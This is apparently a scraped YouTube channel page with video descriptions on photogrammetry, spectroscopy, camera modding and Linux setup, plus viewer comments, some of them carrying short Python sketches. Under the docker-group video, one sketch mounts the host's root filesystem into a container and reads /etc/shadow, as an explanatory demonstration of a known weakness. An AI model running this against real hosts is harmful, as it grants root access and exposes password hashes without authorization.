mpr
Joined 24 Jun 2023
Here's how the 'docker' group is insecure
This is a very brief video illustrating how the docker group gives full root access to the host system (if you're using the default installation, i.e. not rootless docker).
Views: 77
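For illustration, here is a minimal sketch of the claim in the description, using the Docker SDK for Python (docker-py); the bind-mount of the host root is the standard demonstration of why 'docker' group membership is root-equivalent, not something taken from the video itself. The image name and file read are illustrative.

```python
# Sketch: why membership in the 'docker' group is root-equivalent.
# Assumes the Docker SDK for Python ('pip install docker') and a running
# Docker daemon; the user running this is in the 'docker' group but is
# otherwise unprivileged.
import docker

client = docker.from_env()

# Bind-mount the host's root filesystem into a container. Inside the
# container we run as root, so we can read files the calling user cannot,
# e.g. /etc/shadow.
output = client.containers.run(
    "alpine",
    "cat /host/etc/shadow",
    volumes={"/": {"bind": "/host", "mode": "ro"}},
    remove=True,
)
print(output.decode())
```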
Videos
Meshroom: Initial Pipeline, CCTags, using a Turntable and Known Camera Positions
1.1K views · 1 month ago
In this video we look at some aspects of using Meshroom to do 3D reconstructions. We start by discussing the first part of the pipeline, up to the StructureFromMotion node. We may discuss the remaining nodes in a future video. Then we look at automatically scaling our model with CCTags, followed by what changes when we use a turntable. Finally, we look into using known camera positions to make ...
Building a small, simple Turntable (for 3D-Reconstructions)
505 views · 2 months ago
In this video we build a small and simple turntable. The turntable can be used by itself or as part of the big machine that I built for automating 3D reconstructions (see the previous video ua-cam.com/video/CPj8vRa3ZhE/v-deo.html for an overview of the project). If you want to build this yourself then you can find stl files (for the 3d-printed parts) and the code that I'm using at github.com/mp...
Let's do some 3D Reconstruction: Intro and Image Acquisition
184 views · 2 months ago
This is the first video of a mini-series about 3D Reconstructions. In this video we cover: 00:00 Intro / Project Description 02:35 Taking Photos Manually 04:57 Using a Rotating Chair 06:07 Extracting Frames from a Video 09:17 Using a Turntable 10:39 Automating the Entire Process (with a Machine) 12:20 A better Reconstruction with more Photos 13:06 Improvements by Drawing a Random Pattern 14:18 ...
Building an accurate DIY Spectroscope
11K views · 5 months ago
In this video we use a camera that's capable of saving RAW pictures and an analogue / pocket spectroscope to create a DIY digital spectroscope. On the way we talk about many topics that affect our results, including color filter arrays, lenses, etc ... Our spectroscope is limited to the visible range (even a bit less, to roughly 425nm to 675nm) and it's not going to be as accurate as commercial...
A Brief History of Light - From Ancient Greece to the Middle Ages
215 views · 7 months ago
This is the first video in a mini-series about the history of human ideas about the nature of light. It's a huge topic but we'll try to keep it brief and concise. This first part covers the time from the Ancient Greeks up to the Middle Ages. The next videos will continue from the 16th century up to the 20th century. In the future we may look at some topics in more detail. The English translatio...
Mono-Conversion of a Canon 350D
2.1K views · 8 months ago
In this video we convert a Canon 350D to monochrome. We disassemble the camera all the way down to the sensor, remove the top layer of the sensor (which includes the color filter array) and discuss auto focus calibration. We'll remove the top layer of the sensor manually, by scratching it off. See ua-cam.com/video/y39UKU7niRE/v-deo.html&pp=ygUYbGVzIGxhYiBsYXNlciBtb25vY2hyb21l for a video by @Le...
Building a Case for our NAS
48 views · 9 months ago
Now that we've finished our network-attached storage solution, let's build a case for it. The code for controlling the Raspberry Pi can be found at github.com/mpr-projects/RPi-NAS. A detailed guide for setting up the NAS can be found at mpr-projects.com/index.php/2023/11/13/building-a-raspberry-pi-nas-with-data-redundancy-part-1-overview/. This series of posts includes both the actual st...
Raspberry Pi Network Attached Storage with Data Redundancy
128 views · 9 months ago
In this video we install and configure Greyhole on a Raspberry Pi. The video is part of a series of posts about setting up a Network-Attached Storage solution (NAS) with data redundancy. It is intended for home use with a limited number of users. The entire series of posts can be found under mpr-projects.com/index.php/2023/11/13/building-a-raspberry-pi-nas-with-data-redundancy-part-1-overview/ ...
Snapper Rollback on Arch Linux
9K views · 1 year ago
Installing BTRFS with Snapper and Snapper Rollback allows for safe undoing of unwanted changes. In this video I show a basic setup that doesn't break when rolling back after a kernel update. Useful links: - wiki.archlinux.org/title/Installation_guide - wiki.archlinux.org/title/Btrfs - wiki.archlinux.org/title/Snapper
Best video I've seen on Meshroom. Thank you for making this video 😁❤... Can you please give me some more information on exactly how you made your own nodes, or provide some reference material to figure it out?
You are the best! This video has more quality than a lot of paid courses; you gave me the motivation to keep studying Meshroom. If you have a donation link I would love to contribute. PS: I use a closed white cardboard box with 2 lights and it seems to free me from a lot of the problems with the background that you describe in the video.
This is a great tutorial, thanks so much for sharing. So much info on Meshroom here that's undocumented elsewhere. Would you mind sharing your custom nodes? Just to jumpstart someone who's trying to do something similar.
If possible, can you please make a continuation of this video to enable booting into snapshots? It would be very helpful in my case. Thank you!
After many tutorials, this one worked for me, and I'm thankful. It's very fast and straightforward, with explanations.
Thank you! Best Meshroom video I've seen. Epic work!
I gotta be honest, I was thinking… yeah, this is a nightmare but I might be able to have a go… right up to the point of scratching the face of the sensor with the end of tweezers! 😮😮😮 Now I'm done. Not for me, but an interesting video.
You could also add the lamp temperature as a parameter in the machine learning, with a penalty for how far from 2700 K it is; you're consistently getting red low, green high. It feels like with a slight tweak of the "known" temperature you could get a better result. If you do that you could also add in the other lamps: "please find 3 temperatures and 3 spectra, so that these all match".
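A hedged sketch of what this suggestion could look like in code. The blackbody model, the 2700 K target, and the penalty weight are illustrative assumptions, not the pipeline actually used in the video:

```python
# Sketch: treat the lamp temperature as a learnable parameter with a
# penalty for deviating from its nominal 2700 K rating.
import numpy as np
from scipy.optimize import minimize

H, C, K_B = 6.626e-34, 2.998e8, 1.381e-23

def planck(wl_m, temp):
    """Blackbody spectral radiance (arbitrary scale) at wavelength wl_m [m]."""
    return (2 * H * C**2 / wl_m**5) / (np.exp(H * C / (wl_m * K_B * temp)) - 1)

def loss(params, wl_m, measured, t_nominal=2700.0, penalty_weight=1e-3):
    scale, temp = params
    model = scale * planck(wl_m, temp)
    data_term = np.mean((model - measured) ** 2)
    # Penalty keeps the fitted temperature close to the lamp's rated value.
    prior_term = penalty_weight * ((temp - t_nominal) / t_nominal) ** 2
    return data_term + prior_term

wl = np.linspace(425e-9, 675e-9, 200)       # visible range from the video
measured = planck(wl, 2650.0)                # fake data for the demo
measured /= measured.max()

res = minimize(loss, x0=[1.0 / planck(wl, 2700.0).max(), 2700.0],
               args=(wl, measured), method="Nelder-Mead")
print("fitted scale, temperature:", res.x)
```

Fitting all lamps jointly, as the comment suggests, would just stack one (scale, temperature) pair per lamp into `params` and sum the per-lamp data terms.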
I found a lot of videos explaining how to use btrfs on Arch Linux; yours is the best, thanks.
Can't get CCTags to work properly, the FeatureExtraction node behaves very oddly for me. When enabling cctag3 or cctag4, the node crashes on compute (nothing in the log, "aliceVision_featureExtraction has stopped working" from Windows) and no features are extracted. This only happens when I try to load more than 4 images. With 4 images it works fine and detects the tags, but as soon as I put in one more image it crashes on compute. Am I missing something obvious?
If it crashes like that then there's probably an issue in the specific binary of Meshroom that you're using. It also took me some time (an eternity) to get it set up so that everything works. I had to build it in a Docker image that uses Debian 12.6 as the base image; I couldn't get it to run reliably on Arch Linux, Ubuntu 22.04 or Ubuntu 24.04. If you were on Linux then you could use the Dockerfile that I linked to in the video description. Unfortunately I can't help you with Windows, I haven't used that in a long time ...
@@_mpr_ Linux it is then, time to set up a Debian VM... and I should create an issue on GitHub. In the meantime I'm using MeshroomCL for datasets that need CCTags; it runs considerably slower but at least it doesn't crash! Thank you for the fantastic tutorial by the way, a great intro to photogrammetry with Meshroom. You answered all the questions I had in one concise video. Greetings from northern Germany!
Awesome!
Great information, thank you so much for making this! Most tutorials on Meshroom I found are not very detailed, so apart from reading the manual, your video is the best thing to finally start understanding the advanced settings!
Thank you! That's what I was going for :)
Do you have SolidWorks files instead of the STLs? I am planning to make a bigger one.
Hey, no, I'm sorry, I didn't use SolidWorks for the design (I went with the open-source program FreeCAD).
Excellent work, thanks 👍🏻 Please do more motion-control stuff.
Camera technician here who has changed probably 1,000 sensors due to bonding issues. Actually I still have many sensors left. I've seen the progression from monochrome to color. First they used 3-CCD systems in an effort to retain the most possible light, using very expensive prisms. Then the race to find the very best single chip and filtration system began. Every manufacturer had their own way, and despite being a Canon agent for a while I never had to change a Canon CCD. But I had endless requests from enthusiasts who wanted the color filter removed, either for night vision or for artistically perfect monochrome photography. Since I had already suffered enough health damage inhaling chemicals and lead fumes from soldering, I must admit that I failed at removing filters. Others have mentioned that you can actually still find true monochrome sensors, but make sure the sellers actually know what they sell in our drop-ship world.
Hey, thanks for sharing your story about the progression of sensors, I find the history of photography/light so interesting!
Hats off for this extensive research. Throughout my long career I have met endless professors, doctors and engineers. Most have one thing in common: create the very best instrument a human can build. This is the reason they invented the word "Philosophy". For a while I was in the Fuji camp and I had my followers who just loved Fuji colors. Then I did some travels. Cultural interpretations of colors can be wider than the ones in music. Color temperature, and how humans interpret their own sun as the ideal light. Let alone the fact that sunlight creates vitamin D, a fact even the very best researcher cannot escape. Create your own waveform and even the best scientists will never agree with even the weakest of artists. Who would ever admit that they are partially color blind? Well, our brains can not only heal, they can also interpolate. I just love to find the new discoveries from the newly discovered subparticles and how photons are changing research all the time.
If any custom PCBs or 3D printing (for different material needs) can help with future projects, we're open to sponsoring! (PCBWay zoey)
Thank you very much, it worked.
5:30 one solution could be using a tube as a spacer for the inner races of the bearings, and not using "inner" nuts. So when you tighten the upper nut, it will be compressing nut-bearing-spacer-bearing-nut. Just make sure the spacer tube is a tad longer than the space between the bearings in the 3D-printed part.
hey, that's a good idea! I'll do that for version 2 ;)
punks would call this overly nerdy.
Nice video! Thanks for sharing your work! I have been wondering for a long time whether or not photogrammetry for medium/small-size objects was possible. Inputting the positions of the pictures manually sounds like a good idea to improve accuracy; 😰 modifying the code of Meshroom doesn't sound so fun to me. Could you explain how you did it, or share "your version" of Meshroom?
Hey, thank you! I'm planning to spend some time next week trying to set up Meshroom in Docker or Linux containers. Right now my own setup is a bit messy because I'm using the self-compiled version for importing images but a binary for the rest (because right now the GUI and some other functions don't seem to work properly on more up-to-date versions of Linux). If I get it to run smoothly then I'll make the container available and post a blog entry or a video about it.
Hey, I finally got Meshroom/AliceVision to compile in Docker. If you use Linux then try my Dockerfile: github.com/mpr-projects/Meshroom_Docker (I also talk about it in the latest video).
My son did this using a chopstick.
Excellent explanation 💥💥💥💥💥💥💥💥💥💯💯💯💯💯💯💜💜💜💜
I've seen people using a green screen/table and automatically deleting the background of the image. IIRC there is a matte spray you can use that will wash off of shiny objects.
Yes, the spray is definitely something I want to try, mostly for transparent objects like glass. I've done some tests with a green screen, but it did leave a green shimmer on the reconstructed texture (even though the green screen was in the background, not that close to the object; when I put it directly underneath the object the shimmer is quite strong). I'll do some more tests soon.
@@_mpr_ I think I've seen hairspray used as a fogger
Looks like good progress!
@8:00 I think you are right that THAT is what happens when you stop down the lens. But the graph you use to explain it doesn't seem to make the point very clearly. The spectroscope creates an *angular* separation between the spectral wavelengths. The other optical paths through the lens and aperture are simply not available for these angles. @9:00 The (main) issue, I think, is not that the green light has another origin in the source, but that it has a specific angle.
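For reference, the angular separation mentioned above is the standard diffraction-grating relation (textbook optics, not something stated in the video): a grating with groove spacing $d$, illuminated at angle $\theta_i$, sends wavelength $\lambda$ in order $m$ to the angle $\theta_m$ given by

$$ d\,(\sin\theta_m - \sin\theta_i) = m\lambda , $$

so each wavelength leaves the grating at its own angle, and stopping down the lens only restricts which of these angles make it to the sensor.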
What's the point of the .btrfsroot folder? You also didn't put the right subvolume ID for it.
Snapper is just a wrapper, as far as I know. We can roll back directly using btrfs subvolume commands.
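For anyone curious, a minimal sketch of what a rollback with plain btrfs subvolume commands can look like, driven from Python. It assumes a common "@" root-subvolume layout with Snapper snapshots under "@snapshots" (an assumption; your layout may differ); the device path and snapshot number are illustrative, and you'd run this as root from a live environment:

```python
# Sketch: rolling back without Snapper, using plain btrfs commands.
import subprocess

DEVICE = "/dev/sda2"    # assumption: the btrfs partition
SNAPSHOT = "42"         # assumption: the Snapper snapshot to restore

def run(*cmd):
    print("+", " ".join(cmd))
    subprocess.run(cmd, check=True)

# Mount the top-level subvolume (id 5), which contains '@', '@snapshots', ...
run("mount", "-o", "subvolid=5", DEVICE, "/mnt")
# Move the broken root aside and put a writable copy of the snapshot in its
# place; snapshots of snapshots are cheap copy-on-write copies in btrfs.
run("mv", "/mnt/@", "/mnt/@broken")
run("btrfs", "subvolume", "snapshot",
    f"/mnt/@snapshots/{SNAPSHOT}/snapshot", "/mnt/@")
run("umount", "/mnt")
```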
I tried this with a Nikon D5100 a few years ago and failed miserably. The glass covering the sensor is glued on so strongly there was no way to remove it without shattering the whole thing. I even tried heating it to uncomfortable levels but the glue never budged. After hours of trying the glass shattered and the golden pins inside also got ripped.
Sony has probably made the most chips, and probably the hardest-to-remove filter. Heat them a bit and the bonding fails. I changed thousands because of heat failures.
Fantastic project! Thank you for sharing it. I've played with using a webcam (IR filter removed) with Theremino Spectrometer V3.1. The setup was good enough for testing UV passthrough of various lenses down to about 365 nm. My only disappointment was that the setup is too low-resolution for much beyond pass/fail testing. I can't wait to make and try out your project for myself!
A monochrome camera with no Bayer filter layer is actually easy to get. There are two options I can think of: one is a Raspberry Pi module by Arducam, and the other is a naked industrial USB module from a Chinese supplier, UVC-webcam compatible. Neither is actually expensive.
Jesus... this is... BEYOND insanely, amazingly rigorous. And now, I think I'm just going to go buy a spectrometer off the shelf. lol
Most white surfaces (paper, paint, ...) contain fluorescent additives. Huge effect if there's any UV...
I've read from multiple sources that white Teflon is the ideal cheap and available material for a reflective surface from UV through IR, for reasonably accurate UV and IR measurements.
@@jimzielinski946 yes, white Teflon is the right choice, if possible, a frosted one. I used such a reflector to calibrate the spectrometer for measuring a sun simulator for solar panels.
This is awesome. Do you know if the color filtering would affect a version that wants to look at the IR side?
Hey, yes, this specific setup is not really suitable for measuring IR radiation because the IR filter in your camera would block most of the IR wavelengths. Some of the smaller, cheaper camera/lens combinations (e.g. as used for CCTV) contain a removable IR filter, but when I tested those the results were not as good as with a high-quality camera (although I didn't focus on the IR side ...)
thank you so much
I have the privilege of working with actual multi-thousand-dollar calibration lamps and professional spectrophotometers, and I can say that your approach is very commendable. Every technique you've used (except machine learning and modifying an actual SLR) is something I've also done at some point. The only thing I would have done differently is making a calculation pipeline from the entered calibration-lamp color temperature to the estimated solar spectrum, so you can drag a slider and see at which color temperature the solar spectrum is most ideal. Furthermore, it should be very easy to make a gradient descent function for the dips in the solar spectrum, so you can just click on a dip (say, 486 nm) and it will find the exact pixel. For extra kudos, implement a cubic interpolation curve to get sub-pixel accuracy, which I've done too.
That's great feedback, thank you very much! I'll keep your suggestions in mind for a potential follow up (I was thinking of illustrating why using jpegs is not super accurate, could combine that with some other improvements ...)
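A minimal sketch of the sub-pixel dip-finding suggestion from the comment above, combining cubic interpolation with a bounded minimiser. The array names and the 486 nm seed are illustrative stand-ins for the calibrated spectrum, not the video's actual data:

```python
# Sketch: locate a Fraunhofer dip (e.g. near 486 nm) with sub-pixel
# accuracy by minimising a cubic spline through the samples.
import numpy as np
from scipy.interpolate import CubicSpline
from scipy.optimize import minimize_scalar

def refine_dip(wavelengths, intensity, seed_nm, window_nm=5.0):
    """Return the sub-pixel wavelength of the intensity minimum near seed_nm."""
    mask = np.abs(wavelengths - seed_nm) < window_nm
    x, y = wavelengths[mask], intensity[mask]
    spline = CubicSpline(x, y)
    res = minimize_scalar(spline, bounds=(x[0], x[-1]), method="bounded")
    return res.x

# Fake spectrum with a dip at 486.13 nm (H-beta) for demonstration.
wl = np.arange(480.0, 492.0, 0.5)                 # ~0.5 nm per pixel
spec = 1.0 - 0.6 * np.exp(-0.5 * ((wl - 486.13) / 0.8) ** 2)
print(refine_dip(wl, spec, seed_nm=486.0))        # ~486.13
```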
Great video, thanks!
If you put the spectrum at 45 degrees, the mosaics are both nicer to work with, and you get way more pixels to waste on smoothing.
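A back-of-the-envelope note on why the 45-degree trick gains samples (my own sketch, not from the video): with pixel pitch $p$, pixel centers $(i, j)$ project onto a spectrum axis running at 45 degrees at positions

$$ x_{ij} = \frac{(i + j)\,p}{\sqrt{2}} , $$

so successive diagonals sample the spectrum every $p/\sqrt{2} \approx 0.71\,p$ instead of every $p$. On a Bayer mosaic the green pixels also fall on alternating diagonals, which is part of what makes the mosaic nicer to work with at this angle.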
You can get the exact temperature of a light bulb by measuring the voltage across it and the current through it when taking the photo, and then breaking it open and weighing the filament. Don't ask me for the formula though. But it's a cheap way to derive a standard if you have good meters and a microgram scale.
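The commenter's exact formula isn't given, so here is a sketch of a simpler, better-known variant instead: it needs only the filament's cold and hot resistance, using the common approximation that tungsten's resistivity scales roughly as $T^{1.2}$. All numbers below are illustrative:

```python
# Sketch: estimate a tungsten filament's temperature from its hot/cold
# resistance ratio (a swapped-in simplification of the comment's
# weigh-the-filament method, whose formula isn't given above).
T_ROOM = 293.0               # K, temperature at which R_cold was measured
RESISTIVITY_EXPONENT = 1.2   # common approximation for tungsten

def filament_temperature(r_cold, r_hot):
    """Approximate hot filament temperature in kelvin."""
    return T_ROOM * (r_hot / r_cold) ** (1.0 / RESISTIVITY_EXPONENT)

# Example: a small bulb measuring 30 ohms cold and 12 V / 0.05 A when lit.
r_hot = 12.0 / 0.05          # ohms, from the voltage/current measurement
print(f"{filament_temperature(30.0, r_hot):.0f} K")
```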
Pretty nice video and really nice project. I might give it a try as well. Thanks to Fujirumors btw for making me aware of this video.
You should publish a tutorial paper about this method.
There are some photoresist chemicals that can remove the Bayer layer.
Please give us details. I tried deadly ones, only to kill the chip instead.
Take the picture of the spectrum at an angle on the Bayer filter? Fluorescent lights are good for calibration as well. 25:16 glass is terrible for UV. And IR cutoff is a pain as well.
Great suggestions, I like the idea of taking a picture at an angle!
@@_mpr_ You can theoretically get better resolution because... Pythagoras and all that stuff. The cameras I like playing with are the camera modules you can get from China. They'll either be C/CS or M12 mount (that you can actually take off). The IR filters are pretty easy to remove or replace. You can find some very narrow-FoV lenses. You can put a piece of diffraction grating right in front of the lens and angle it away from a slit of razor blades in a box. But if you want to stick with raw image data, a Pi with a camera module could probably replace the USB cameras. With a different lens setup you can even turn it into a microscope with a 3D-printed tube and a cheap objective.
So I do have a few cheap M12-mount cameras lying around and I used them in my initial tests. Being able to easily remove the IR filter is certainly very useful, but I found the quality/resolution of the images to be worse than that of my XT2/4. Also, with cheap lenses like those we do have to worry about distortions and aberrations impacting our results. Another reason for choosing this setup was that I wanted to keep the hardware tinkering to a minimum for this project. There's also one more point against using jpegs that I didn't mention in the video (because I only thought about it afterwards): the white-balancing process used when creating jpegs will impact the accuracy of your results (I'll post something about that once I've tested it thoroughly).
White balancing and de-linearization of intensity values are so inaccurate in cameras, it's not even a joke.
Great work! 🌈🤗
Wow, this is absolutely *_brilliant!_* I'm just blown away by all the work you did to establish the calibration 🤯 I'd imagine that the spectral width of the Fraunhofer lines is well known; can you determine the resolution of your spectrograms from them? (I don't know how resolution is specified, but assume it's something like FWHM.) This is really outstanding work, and your explanation of all of it was crystal-clear! Thanks for sharing, and good luck on your future projects! (A couple of minutes later… :-) I was thinking a bit more about resolution and how to increase it, and had a maybe-harebrained idea: From camera testing, I'm familiar with the slanted-edge test on the ISO-12233 resolution test target. The idea is that a slightly slanted black/white edge will result in a whole range of pixels with more or less of the white side of the edge falling within them. From this, you can extract a curve that shows the spatial response of the camera's sensor with sub-pixel resolution. Although I haven't seen it done in camera imaging, it seems to me that you could extract the point-spread function and then deconvolve (I think that's what the operation would be; I'd have to think about it more) it from the camera's images to get an optimally sharpened image. I wonder if you could extract similar information and perform a similar deconvolution for spectral resolution by rotating the grating axis slightly and then looking along the columns of pixels to see what the transitions look like? You wouldn't have something as clean as a sharp black/white edge to work with, but intuitively it seems like you ought to be able to do something with the Fraunhofer lines to accomplish something like this. (Oh - could you maybe use ML to adjust a deconvolution function until the profiles of the Fraunhofer lines more closely match their actual structure?) I dunno if anything along these lines would work, and it's probably way more effort than you'd want to put into this particular project, but the whole project is very intriguing to me 😁 (I may be all wet here; I should be going to bed, so my brain isn't very sharp and I don't have time to devote to thinking about it.)
Hey Dave, thanks for your kind words about the video, it was a lot of work and it's great to get feedback like that! I really like your idea about the slanted-edge/slanted-Fraunhofer lines. At first glance I think that could work at some of the very steep and deep Fraunhofer lines. I also think that it will require a lot of careful thinking and testing to see if and how well it works (so many of the great ideas that I've had fell apart when testing them carefully :D ). In any case, I'll put it on my list of future things to test!
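Regarding the FWHM question in the thread above, a minimal sketch of estimating resolution from a narrow absorption line by locating its half-depth crossings. The array names and the Gaussian test dip are illustrative, not the video's data:

```python
# Sketch: estimate spectral resolution as the FWHM of a (ideally narrow)
# absorption line, via linear interpolation to the half-depth crossings.
import numpy as np

def dip_fwhm(wavelengths, intensity):
    """FWHM of the deepest dip in the spectrum."""
    i_min = np.argmin(intensity)
    depth = intensity.max() - intensity[i_min]
    half = intensity[i_min] + depth / 2.0

    # Walk outwards from the minimum to the half-depth crossing,
    # interpolating linearly between the bracketing samples.
    def crossing(indices):
        for a, b in zip(indices, indices[1:]):
            if intensity[b] >= half:
                frac = (half - intensity[a]) / (intensity[b] - intensity[a])
                return wavelengths[a] + frac * (wavelengths[b] - wavelengths[a])
        raise ValueError("no half-depth crossing found")

    left = crossing(range(i_min, -1, -1))
    right = crossing(range(i_min, len(intensity)))
    return right - left

# Fake Gaussian dip (sigma = 0.8 nm, true FWHM ~1.88 nm) for demonstration.
wl = np.arange(480.0, 492.0, 0.1)
spec = 1.0 - 0.6 * np.exp(-0.5 * ((wl - 486.13) / 0.8) ** 2)
print(f"{dip_fwhm(wl, spec):.2f} nm")
```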
Very good work and excellent video!
More stuff man. Liked this vid very much.
Thanks, and greetings from Thun :)
Nice video kickoff. I'm excited to see more!
Waiting for the comparison between BW mode (picture style) and actual monochrome. Do you see any improvement in resolution/detail?